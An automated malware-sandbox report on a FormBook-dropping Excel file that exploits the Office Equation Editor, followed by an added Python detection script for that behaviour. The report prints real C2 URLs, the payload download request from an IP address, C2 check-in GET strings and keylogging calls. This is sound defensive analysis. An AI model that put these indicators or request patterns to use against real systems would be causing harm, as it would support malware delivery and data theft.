Windows Analysis Report RFQ_Order_PO_TAE5203E.xlsx

Overview

General Information

Sample Name: RFQ_Order_PO_TAE5203E.xlsx
Analysis ID: 552838
MD5: 552f043a7c752ec7e8dddbdf0b36c4d8
SHA1: cfb4a5bea12cab9a47d3ff1ee1210d444b9a92a4
SHA256: e7a5f1c37a043773027f4937afb63d3178362113132066c7435b6d716eda6cf2
Tags: VelvetSweatshop, xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Found hidden mapped module (file has been removed from disk)
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Potential key logger detected (key state polling based)
Drops PE files to the user directory
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

Found malware configuration
Source: 00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.dreamschools.online/b80i/"], "decoy": ["yixuan5.com", "jiazheng369.com", "danielleefelipe.net", "micorgas.com", "uvywah.com", "nbjcgl.com", "streets4suites.com", "hempgotas.com", "postmoon.xyz", "gaboshoes.com", "pastodwes.com", "libes.asia", "damusalama.com", "youngliving1.com", "mollyagee.com", "branchwallet.com", "seebuehnegoerlitz.com", "inventors.community", "teentykarm.quest", "927291.com", "wohn-union.info", "rvmservices.com", "cuanquotex.online", "buysubarus.com", "360e.group", "markham.condos", "carriewilliamsinc.com", "ennitec.com", "wildberryhair.com", "trulyrun.com", "pinkandgrey.info", "mnselfservice.com", "gabtomenice.com", "2thpolis.com", "standardcrypro.com", "58lif.com", "ir-hasnol.com", "ggsega.xyz", "tipslowclever.rest", "atlasgrpltdgh.com", "4338agnes.com", "hillsncreeks.com", "pentest.ink", "cevichiles.com", "evodoge.com", "gooooooo.xyz", "ehaszthecarpetbagger.com", "finanes.xyz", "zoharfine.com", "viperiastudios.com", "sjljtzsls.com", "frentags.art", "mediafyagency.com", "faydergayremezdayener.net", "freelance-rse.com", "quickmovecourierservices.com", "lexingtonprochoice.com", "farmacymerchants.com", "inkland-tattoo.com", "aloebiotics.com", "rampi6.com", "bookinggroningen.com", "wilkinsutotint.com", "inslidr.com"]}
Multi AV Scanner detection for submitted file
Source: RFQ_Order_PO_TAE5203E.xlsx Virustotal: Detection: 35%
Source: RFQ_Order_PO_TAE5203E.xlsx ReversingLabs: Detection: 34%
Yara detected FormBook
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000000.552022647.0000000009317000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.545422441.0000000009317000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.524809479.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.698410685.00000000008D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.560797840.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.525559537.000000000060D000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.698075254.00000000000D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.560772297.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.698230838.00000000003D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.525124582.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Cielert.tmp, type: DROPPED
Antivirus detection for URL or domain
Source: http://209.141.37.110/hnmy.exe Avira URL Cloud: Label: malware
Source: http://www.aloebiotics.com/b80i/?XXAT9NU=u8CFGDbLa+paDYPUt2HIfZvLGaLNzu7WkG1ejV9QOUI0TwLOmLGNbUmrlgsvnY/sa5UfOA==&bFQL=2dJLx4-Hc4v Avira URL Cloud: Label: malware
Source: www.dreamschools.online/b80i/ Avira URL Cloud: Label: phishing
Source: http://www.sjljtzsls.com/b80i/?XXAT9NU=S1GZrcUjP6Mqu1rkaE68XUwdav2ZAuLdhfc3NoUcKUpIPYlLOeb3MkcjdHuyJHfoxw3F9Q==&bFQL=2dJLx4-Hc4v Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://209.141.37.110/hnmy.exe Virustotal: Detection: 12%
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Cielert.tmp Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\Public\vbc.exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen3
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hnmy[1].exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen3
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hnmy[1].exe Metadefender: Detection: 31%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hnmy[1].exe ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Temp\Cielert.tmp Metadefender: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\Cielert.tmp ReversingLabs: Detection: 89%
Source: C:\Users\Public\vbc.exe Metadefender: Detection: 31%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 60%
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hnmy[1].exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 5.2.vbc.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.0.vbc.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen3
Source: 4.2.vbc.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen3
Source: 5.0.vbc.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.vbc.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen3
Source: 8.2.msiexec.exe.2b5796c.6.unpack Avira: Label: TR/Patched.Gen
Source: 4.1.vbc.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen3
Source: 4.1.vbc.exe.2130000.1.unpack Avira: Label: TR/Crypt.XPACK.Gen3
Source: 5.0.vbc.exe.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: msiexec.pdb source: vbc.exe, 00000005.00000002.560819872.0000000000460000.00000040.00020000.sdmp, vbc.exe, 00000005.00000002.560884485.00000000004EA000.00000004.00000020.sdmp, vbc.exe, 00000005.00000002.560868156.00000000004D9000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000002.560943288.0000000000750000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.526246673.00000000005C0000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.561680130.00000000008D0000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.525339285.00000000002B0000.00000004.00000001.sdmp, msiexec.exe
Source: C:\Users\Public\vbc.exe Code function: 4_2_00437A5E __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA, 4_2_00437A5E

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: www.aloebiotics.com
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop edi 5_2_0040C40A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then pop edi 8_2_000DC40A
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 209.141.37.110:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 209.141.37.110:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 163.197.71.43:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 163.197.71.43:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 163.197.71.43:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 163.197.71.43 80
Source: C:\Windows\explorer.exe Domain query: www.mediafyagency.com
Source: C:\Windows\explorer.exe Network Connect: 64.190.62.111 80
Source: C:\Windows\explorer.exe Domain query: www.aloebiotics.com
Source: C:\Windows\explorer.exe Domain query: www.sjljtzsls.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.dreamschools.online/b80i/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: PONYNETUS PONYNETUS
Source: Joe Sandbox View ASN Name: NBS11696US NBS11696US
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /b80i/?XXAT9NU=u8CFGDbLa+paDYPUt2HIfZvLGaLNzu7WkG1ejV9QOUI0TwLOmLGNbUmrlgsvnY/sa5UfOA==&bFQL=2dJLx4-Hc4v HTTP/1.1 Host: www.aloebiotics.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b80i/?XXAT9NU=S1GZrcUjP6Mqu1rkaE68XUwdav2ZAuLdhfc3NoUcKUpIPYlLOeb3MkcjdHuyJHfoxw3F9Q==&bFQL=2dJLx4-Hc4v HTTP/1.1 Host: www.sjljtzsls.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 64.190.62.111 64.190.62.111
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 11 Jan 2022 22:12:56 GMT Accept-Ranges: bytes ETag: "109cc962387d81:0" Server: Microsoft-IIS/8.5 Date: Fri, 14 Jan 2022 03:08:59 GMT Content-Length: 598016
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /hnmy.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 209.141.37.110 Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 209.141.37.110
Source: explorer.exe, 00000006.00000000.540569412.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000006.00000000.543806388.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.609127539.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.540569412.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.540569412.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.535970615.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.603307260.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000006.00000000.548374116.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.548374116.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000006.00000000.603581643.0000000001BE0000.00000002.00020000.sdmp, msiexec.exe, 00000008.00000002.698588775.00000000020C0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.531428827.0000000003E50000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.548374116.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: msiexec.exe, 00000008.00000002.699478869.0000000002CD2000.00000004.00020000.sdmp String found in binary or memory: http://sogou.9898top1.com/sscx.html
Source: explorer.exe, 00000006.00000000.543806388.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.609127539.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.543806388.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.609127539.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.548374116.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000006.00000000.603581643.0000000001BE0000.00000002.00020000.sdmp, msiexec.exe, 00000008.00000002.698588775.00000000020C0000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.535970615.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.603307260.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000006.00000000.543806388.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.609127539.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.540569412.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.548374116.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.543806388.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.540569412.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.608259374.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.544945610.0000000008391000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.545161733.0000000008420000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.551698331.0000000008420000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.551589349.0000000008391000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.543545616.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.549824786.00000000044E7000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.545161733.0000000008420000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.551698331.0000000008420000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.pir
Source: explorer.exe, 00000006.00000000.544945610.0000000008391000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.545161733.0000000008420000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.551698331.0000000008420000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.551589349.0000000008391000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.540569412.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: msiexec.exe, 00000008.00000002.699478869.0000000002CD2000.00000004.00020000.sdmp String found in binary or memory: https://sedo.com/search/details/?partnerid=324561&language=it&domain=aloebiotics.com&origin=sales_la
Source: explorer.exe, 00000006.00000000.535970615.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.603307260.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000006.00000000.535970615.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.603307260.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000006.00000000.535970615.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.603307260.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BCAAC72D.emf
Source: unknown DNS traffic detected: queries for: www.aloebiotics.com

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Potential key logger detected (key state polling based)
Source: C:\Users\Public\vbc.exe Code function: 4_2_00432A4F GetKeyState,GetKeyState,GetKeyState,GetKeyState, 4_2_00432A4F
Source: C:\Users\Public\vbc.exe Code function: 4_2_00435DBA GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 4_2_00435DBA

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000000.552022647.0000000009317000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.545422441.0000000009317000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.524809479.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.698410685.00000000008D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.560797840.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.525559537.000000000060D000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.698075254.00000000000D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.560772297.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.698230838.00000000003D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.525124582.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Cielert.tmp, type: DROPPED

System Summary:

Malicious sample detected (through community Yara rule)
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.552022647.0000000009317000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.552022647.0000000009317000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.545422441.0000000009317000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.545422441.0000000009317000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.524809479.0000000000401000.00000020.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.524809479.0000000000401000.00000020.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.698410685.00000000008D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.698410685.00000000008D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.560797840.0000000000430000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.560797840.0000000000430000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.525559537.000000000060D000.00000004.00000020.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.525559537.000000000060D000.00000004.00000020.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.698075254.00000000000D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.698075254.00000000000D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.560772297.0000000000401000.00000020.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.560772297.0000000000401000.00000020.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.698230838.00000000003D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.698230838.00000000003D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.525124582.0000000000401000.00000020.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.525124582.0000000000401000.00000020.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\Cielert.tmp, type: DROPPED Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: C:\Users\user\AppData\Local\Temp\Cielert.tmp, type: DROPPED Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hnmy[1].exe
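The two "File created" lines above are the behaviour a host-based detection should key on: the Equation Editor has no legitimate reason to write a PE to disk, to spawn a child, or to talk to the network, so any of these from EQNEDT32.EXE is a high-confidence signal regardless of which CVE was used. The following is an added example written for this page, not Joe Sandbox code or one of its Sigma rules. It applies those three checks, plus "execution from C:\Users\Public", to constructed Sysmon-style events (event IDs 1, 3 and 11) modelled on the paths in this report; the events, the IP address and the rule names are the editor's own.

```python
from pathlib import PureWindowsPath

# Constructed Sysmon-style events (not telemetry from the sandbox run). Event IDs
# follow Sysmon: 1 = process create, 3 = network connection, 11 = file create.
EQNEDT32 = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
EXCEL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"
SAMPLE_EVENTS = [
    {"id": 11, "image": EQNEDT32, "target": r"C:\Users\Public\vbc.exe"},
    {"id": 11, "image": EQNEDT32,
     "target": r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hnmy[1].exe"},
    {"id": 1, "image": r"C:\Users\Public\vbc.exe", "parent": EQNEDT32},
    {"id": 3, "image": EQNEDT32, "dest": "203.0.113.10:80"},  # constructed, documentation-range IP
    # Benign noise that must not alert: Excel writing a scratch file, and Excel
    # launching the equation editor for an embedded equation object.
    {"id": 11, "image": EXCEL, "target": r"C:\Users\user\AppData\Local\Temp\~DF1234.tmp"},
    {"id": 1, "image": EQNEDT32, "parent": EXCEL},
]

EXECUTABLE_SUFFIXES = {".exe", ".dll", ".scr", ".com", ".pif"}


def is_eqnedt32(path):
    """Match on the image name only, so a non-default Office install path still hits."""
    return PureWindowsPath(path).name.lower() == "eqnedt32.exe"


def under_users_public(path):
    """True for anything below <drive>:\\Users\\Public, the world-writable drop location used here."""
    parts = [p.lower() for p in PureWindowsPath(path).parts]
    return parts[1:3] == ["users", "public"]


def detect(events):
    """Return (rule_name, detail) tuples for every event that trips a rule."""
    alerts = []
    for ev in events:
        if ev["id"] == 11 and is_eqnedt32(ev["image"]):
            # Rule 1: Equation Editor writes a PE-like file anywhere on disk.
            if PureWindowsPath(ev["target"]).suffix.lower() in EXECUTABLE_SUFFIXES:
                alerts.append(("eqnedt32_drops_executable", ev["target"]))
        elif ev["id"] == 1:
            # Rule 2: any child of EQNEDT32.EXE (it never spawns processes legitimately).
            if is_eqnedt32(ev.get("parent", "")):
                alerts.append(("eqnedt32_spawns_process", ev["image"]))
            # Rule 3: execution out of C:\Users\Public, independent of the parent.
            if under_users_public(ev["image"]):
                alerts.append(("execution_from_users_public", ev["image"]))
        elif ev["id"] == 3 and is_eqnedt32(ev["image"]):
            # Rule 4: Equation Editor opening a network connection (payload download).
            alerts.append(("eqnedt32_network_connection", ev["dest"]))
    return alerts


if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(f"{rule}: {detail}")
```

The parent check is deliberately separate from the image check: Excel starting EQNEDT32.EXE is normal and must stay quiet, while EQNEDT32.EXE starting anything is not. Matching on the image name rather than the full path keeps the rule working on 64-bit Office installs where the path differs.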
Yara signature match
